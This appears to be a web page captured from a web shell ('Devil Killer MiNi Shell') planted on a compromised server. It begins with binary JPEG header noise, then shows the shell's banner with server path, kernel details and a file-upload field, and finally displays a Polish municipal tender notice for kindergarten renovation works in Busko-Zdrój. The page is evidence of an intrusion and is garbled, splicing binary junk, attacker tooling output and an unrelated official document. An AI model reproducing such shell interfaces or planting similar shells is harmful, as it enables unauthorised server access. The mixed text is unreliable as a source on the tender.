JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221202/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221202/0047441701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> &#34;Rozbudowa infrastruktury przedszkolnej w Busku-Zdroju&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Busko-Zdrój</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 291009716</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">al. Mickiewicza 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Busko-Zdrój</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">28-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL722 - Sandomiersko-jędrzejowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(+48) 41 370-52-00</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@umig.busko.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.umig.busko.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> &#34;Rozbudowa infrastruktury przedszkolnej w Busku-Zdroju&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ccc9814c-723e-11ed-aea3-5a7c432eaced</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00474417</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00029786/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.24 Rozbudowa infrastruktury przedszkolnej w Busku-Zdroju</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/Postepowania <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">miniPortal https://miniportal.uzp.gov.pl, ePUAP https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">I. Informacje o środkach komunikacji elektronicznej, przy użyciu których Zamawiający będzie komunikował się z Wykonawcami, oraz informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej.<br/>1.	W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się drogą elektroniczną przy użyciu miniPortalu https://miniportal.uzp.gov.pl, ePUAPu https://epuap.gov.pl/wps/portal <br/>2.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.<br/>3.	Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu, opisane zostały w Regulaminie korzystania z miniPortalu dostępnym pod adresem https://miniportal.uzp.gov.pl/WarunkiUslugi oraz Regulaminie ePUAP.<br/>4.	Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z miniPortalu, określone w Regulami¬nie miniPortalu oraz zobowiązuje się korzystając z miniPortalu przestrzegać postanowień tego regulaminu.<br/>5.	Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do złożenia i wycofania oferty oraz do komunikacji wynosi 150 MB.<br/>6.	Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na ePUAP.<br/>7.	W postępowaniu o udzielenie zamówienia korespondencja (inna niż oferta Wykonawcy i załączniki do oferty) odbywa się elektronicznie za pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez miniPortal (Formularz do komunikacji). Korespondencja przesłana za pomocą tego formularza nie może być szyfrowana. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP).<br/>8.	Przekazanie korespondencji w sposób opisany w ust. 7 wymaga obowiązkowego poinformowania Zamawiającego o przekazaniu wiadomości na adres e-mail wskazany w rozdziale I „Zamawiający” (niedopełnienie tego obowiązku uznane będzie, jako nieskuteczne przekazanie dokumentów). Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej”.<br/>9.	...<br/>10. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ.<br/>11.	Postępowanie o udzielenie zamówienia prowadzi się w języku polskim.<br/>12. Dokumenty i oświadczenia składane przez wykonawcę powinny być w języku polskim. W przypadku załączenia dokumentów sporządzonych w innym języku niż dopuszczony, wykonawca zobowiązany jest załączyć tłumaczenie na język polski.<br/>II. XIV.	Opis sposobu przygotowania oferty.<br/><br/>1.	Oferta musi być sporządzona w języku polskim, w postaci elektronicznej w formacie danych <br/>w szczególności: .pdf, .doc, .docx, .rtf, .xps, .odt i opatrzona kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>2.	W celu korzystania z systemu miniPortal konieczne jest dysponowanie przez użytkownika urządzeniem teleinformatycznym z dostępem do sieci Internet. Aplikacja działa na Platformie Windows, Mac i Linux.<br/>3.	...<br/>4.	Sposób zaszyfrowania oferty opisany został w Instrukcji użytkownika dostępnej na miniPortalu (odbywa się automatycznie).<br/>5.	Do przygotowania oferty konieczne jest posiadanie przez osobę upoważnioną do reprezentowania Wykonawcy kwalifikowanego podpisu elektronicznego, podpisu osobistego lub podpisu zaufanego.<br/>Szczegółowe informacje zawarto w rozdziale IX i XIV SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia <br/>27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>	administratorem Pani/Pana danych osobowych jest Burmistrz Miasta i Gminy Busko-Zdrój ul. Mickiewicza 10, 28-100 Busko-Zdrój, tel. 41 370 52 80<br/>	inspektorem ochrony danych osobowych w Urzędzie Miasta i Gminy w Busku-Zdroju jest Pani Katarzyna Irla-Sztefko, kontakt: iod@umig.busko.pl, tel. 41 370 52 60* <br/>	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego;<br/>	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2022 r. poz. 1710 z późn. zm.); <br/>	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia lub na okres przechowywania tych danych zgodnie z wytycznymi o dofinansowania z środków UE;<br/>	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym <br/>z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>	posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>	nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>Jednocześnie Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od Wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie <br/>co najmniej jedno z włączeń, o których mowa w art. 14 ust. 5 RODO.<br/>* Wyjaśnienie: informacja w tym zakresie jest wymagana, jeżeli w odniesieniu do danego administratora lub podmiotu przetwarzającego istnieje obowiązek wyznaczenia inspektora ochrony danych osobowych.<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/> o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RSID.271.31.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 - Przebudowa i termomodernizacja obiektu gminnego na ul. ppłk. Srogiego w Busku-Zdroju obejmuje:<br/>a) termomodernizację i remont pokrycia dachowego:<br/>- rozbiórka istniejących betonowych czapek kominowych, przemurowanie, podmurowanie o ok. 20cm, zamurowanie części kominów, uzupełnienie czapek betonowych i tynków cementowo-wapiennych oraz malowanie farbami elewacyjnymi na kominach, <br/>- demontaż istniejącej oraz wykonanie nowej instalacji odgromowej dachu z drutu ocynkowanego fi 8mm (instalacja zamontowana na nowych wspornikach w układzie jak przed demontażem), <br/>- docieplenie dachu styropapą grub. 15cm dwustronnie laminowaną (styropian w styropapie EPS100-036) wraz z pokryciem styropapy 2 warstwami papy termozgrzewalnej (papa termozgrzewalna podkładowa oraz nawierzchniowa o grub. min. 5,2mm) na uprzednio przygotowanym podłożu, <br/>- montaż kominków wentylacyjnych i wywietrzaków kanalizacyjnych, <br/>- wykonanie drewnianej konstrukcji pod obróbki blacharskie i orynnowanie wraz z wykonaniem powyższych, <br/>- wykonanie obróbek kominów i wyłazu na dach z papy termozgrzewalnej grub. min. 5,2mm, <br/>- montaż rynien dachowych półokrągłych o średnicy 15cm z blachy stalowej ocynkowanej powlekanej (orynnowanie systemowe wraz z koniecznymi akcesoriami) w kolorze RAL <br/><br/>b) roboty remontowe wewnętrzne oraz roboty naprawcze malarskie: <br/>- w piwnicach - demontaż wszystkich skrzydeł drzwiowych wraz z ościeżnicami, montaż nowych elementów: listew aluminiowych w otworach drzwiowych, skrzydeł drzwiowych płytowych wewnętrznych jednodzielnych pełnych wytłaczanych drewnopodobnych z ościeżnicą drewnianą oraz skrzydeł drzwiowych płytowych wewnętrznych łazienkowych z kratką nawiewną jednodzielnych pełnych wytłaczanych drewnopodobnych z ościeżnicą drewnianą,<br/>- w piwnicach - wykucie z muru kratek wentylacyjnych, zerwanie okładzin ściennych i podłogowych (tapety, płytki, rulon PCV, listwy podłogowe), <br/>- w piwnicach – wykonanie posadzek: wykonanie podkładów betonowych, wyrównanie nierówności, izolacje przeciwwilgociowe i przeciwwodne z folii polietylenowej, uzupełnienie posadzek z zatarciem na ostro, gruntownie podłoży, wykonanie posadzek z płytek terakotowych wraz z cokolikami,<br/>- w piwnicach – malowanie ścian i sufitów farbami emulsyjnymi po uprzednim przygotowaniu powierzchni; polakierowanie lamperii,<br/> - w piwnicach – licowanie ścian płytkami glazurowanymi,<br/> - obsadzenie nowych kratek wentylacyjnych w ścianach, <br/>- na pozostałych kondygnacjach - malowanie ścian i sufitów pomieszczeń po przeprowadzeniu prac remontowych na uprzednio przygotowanych podłożach (zachowanie kolorystyki pomieszczeń)<br/>- wymiana części istniejących parapetów wewnętrznych po przeprowadzonych pracach związanych <br/>z wymianą okien: parapety z konglomeratu o kolorystyce analogicznej do istniejących<br/> - wymiana skrzydła drzwiowego wraz z ościeżnicą (przy wejściu do piwnicy) na elementy <br/> analogiczne do zastosowanych na poziomie parteru<br/><br/>c) docieplenie budynku: <br/>- demontaż istniejących elementów zamontowanych do elewacji oraz ponowny montaż nowych elementów,<br/>- ściany zewnętrzne kondygnacji nadziemnych docieplone styropianem EPS 70-031 grub. 14cm (λ max = 0,031W/m*K), <br/>- ościeża okienne i drzwiowe ocieplone styropianem samogasnącym EPS 70-031 grub. 3cm (λ max = 0,031W/m*K), <br/>- wykonanie wyprawy elewacyjnej cienkowarstwowej z akrylowych tynków dekoracyjnych o fakturze kamyczkowej. grub. 1,5mm (ściany płaskie, powierzchnie poziome, słupy, ościeża) (kolor od uzgodnienia z Zamawiającym),<br/>- wykonanie wyprawy elewacyjnej cienkowarstwowej z żywicznych tynków dekoracyjnych o fakturze kamyczkowej grub. 1,5mm (cokół) (kolor od uzgodnienia z Zamawiającym),<br/>- montaż rur spustowych z blachy stalowej ocynkowanej w kolorze RAL ,<br/>- wykonanie parapetów zewnętrznych z blachy powlekanej oraz pozostałych obróbek blacharskich.<br/><br/>d) izolację termiczną ścian fundamentowych wraz z pracami towarzyszącymi: <br/>- prace rozbiórkowe istniejących nawierzchni, naświetli, schodów betonowych, <br/>- wykonanie impregnacji biobójczej natryskowej,<br/>- wykonanie izolacji przeciwwilgociowej z emulsji i roztworów asfaltowych modyfikowanych oraz papy termozgrzewalnej,<br/>- wykonanie izolacji termicznej przy użyciu styropianu ekstrudowanego wodoodpornego XPS100 grub. 15cm (λ max = 0,035W/m*K),<br/>- odtworzenie opaski i chodnika z kostki betonowej bezfazowej grub. 6cm na podsypce cementowo-piaskowej (przyjęto 100% kostki nowej)<br/>- odtworzenie schodów żelbetowych, podjazdu dla niepełnosprawnych, tarasów i naświetli wraz z okładziną ww. elementów i elementami towarzyszącymi (balustrady, pochwyty itp.). Na tarasach należy zastosować okładzinę poliuretanową. <br/>- balustrady tarasów, schodów i pochylni dla niepełnosprawnych należy wykonane ze stali nierdzewnej „inox” na wzór istniejących elementów – zgodnie z obowiązującymi przepisami technicznymi dot. obiektów użyteczności publicznej typu obiekt przedszkolny,<br/>- izolacje przeciwwilgociowe tarasu<br/>- rozbiórka, przemurowanie wraz z tynkowaniem murków przy tarasach zewnętrznych od strony południowej. <br/><br/>e) remont daszków nad wejściami do budynku:<br/>- rozebranie elementów daszków,<br/>- ułożenie płyt styropianowych EPS 70 grub. 3cm<br/>- wykonanie nowego pokrycia z papy termozgrzewalnej,<br/>- wykonanie wyprawy elewacyjnej cienkowarstwowej z akrylowych tynków dekoracyjnych,<br/> - wykonanie obróbek blacharskich, <br/> - montaż rynien dachowych półokrągłych o średnicy 10cm oraz z rur spustowych o średnicy 8cm z blachy stalowej ocynkowanej powlekanej (orynnowanie systemowe wraz z koniecznymi akcesoriami) w kolorze RAL <br/><br/>f) wymianę stolarki okiennej i drzwiowej: <br/>- stolarka okienna z PCV o współczynniku przenikania ciepła U max = 0,9 W/m2K, szyby zespolone podwójne lub potrójne, okna rozwierane i uchylno-rozwierane wyposażone w nawiewniki higrosterowalne oraz z rekuperatorem, okna jedno – dwudzielne.; <br/>- stolarka drzwiowa zewnętrzna z ciepłego aluminium o współczynniku przenikania ciepła U max = 1,3 W/m2K, izolacyjność akustyczne a Rw = 35dB, uszczelki kauczukowe, drzwi wyposażone w zamki,<br/>- wymiana parapetów wewnętrznych (13szt) z konglomeratu o kolorystyce analogicznej do istniejących parapetów wraz z obróbką i obsadzeniem ,<br/>- wymiana krat stalowych zabezpieczających naświetla piwnic na nowe (6szt)<br/>- wymiana drzwiczek do zsypów (2 szt) na nowe elementy termoizolacyjne wraz z montażem zamków zabezpieczających przed dostępem nieupoważnionych osób,<br/><br/>g) wykonanie instalacji odgromowej na ścianach:<br/>- montaż wsporników naciągowych oraz osłon p.poż. przewodów uziemiających pod styropianem,<br/>- montaż zwodów pionowych instalacji naprężanych z drutu ocynkowanego fi 8mm,<br/>- montaż złączy kontrolnych z połączeniem drut-płaskownik w instalacji odgromowej lub przewodów wyrównawczych z puszkami pomiarowymi ze skrzynkami pomiarowymi <br/> - pomiar instalacji odgromowej<br/><br/>h) montaż instalacji fotowoltaicznej o mocy nominalnej 17kWp:<br/> - montaż 34 szt. modułów monokrystalicznych o mocy 500 Wp każdy zainstalowanych na dachu budynku przy pomocy aluminiowych konstrukcji ,<br/>- połączenie modułów przewodem solarnym sprowadzonym wolnym przewodem wentylacyjnym do rozdzielnicy TR-Dc zainstalowanej na poziomie piętra budynku,<br/>- montaż inwertera o mocy 17kWp i szafki zabezpieczeń AC<br/><br/>i) instalacje wewnętrzne – elektryczne:<br/>- wymiana instalacji elektrycznej w pomieszczeniach piwnic,<br/>- wykonanie podejść oraz montaż w pomieszczeniach piwnic przepływowych wiszących podgrzewaczy wody użytkowej o mocy do 6,5kW,<br/> - przeprowadzenie pomiarów oraz badań linii kablowej.<br/><br/>j) instalacje wewnętrzne – sanitarne:<br/> - demontaż istniejącej armatury sanitarnej w pomieszczeniach piwnic,<br/> - montaż nowych umywalek i zlewozmywaka wraz z bateriami umywalkowymi oraz ustępu.<br/><br/>k) instalacje wewnętrzne – centralnego ogrzewania:<br/>- wymiana instalacji centralnego ogrzewania w pomieszczeniach piwnic,<br/>- demontaż istniejących grzejników oraz montaż nowych grzejników w pomieszczeniach piwnic.<br/><br/>l) wyposażenie obiektu w: meble biurowe, meble kuchenne, pomoce dydaktyczne, zabawki, instrumenty muzyczne. <br/> Szczegółowa charakterystyka oraz ilości poszczególnych elementów wyposażenia ujęto w Zestawieniu stanowiącym załącznik nr 12a.<br/><br/>ł) wyposażenie obiektu w elementy placu zabaw: <br/>- rozbiórka istniejącego placu zabaw wraz z utylizacją urządzeń zabawowych (3szt.), <br/>- wymiana urządzeń placu zabaw na nowe elementy, <br/>- montaż elementów małej architektury (ławki, kosze na śmieci, regulamin placu zabaw),<br/>- uporządkowanie terenu po ww. pracach wraz z wykonaniem nawierzchni trawiastej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111100-9 - Roboty w zakresie burzenia</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45421140-7 - Instalowanie stolarki metalowej, z wyjątkiem drzwi i okien</p> <p class="mb-0">45262100-2 - Roboty przy wznoszeniu rusztowań</p> <p class="mb-0">45443000-4 - Roboty elewacyjne</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> 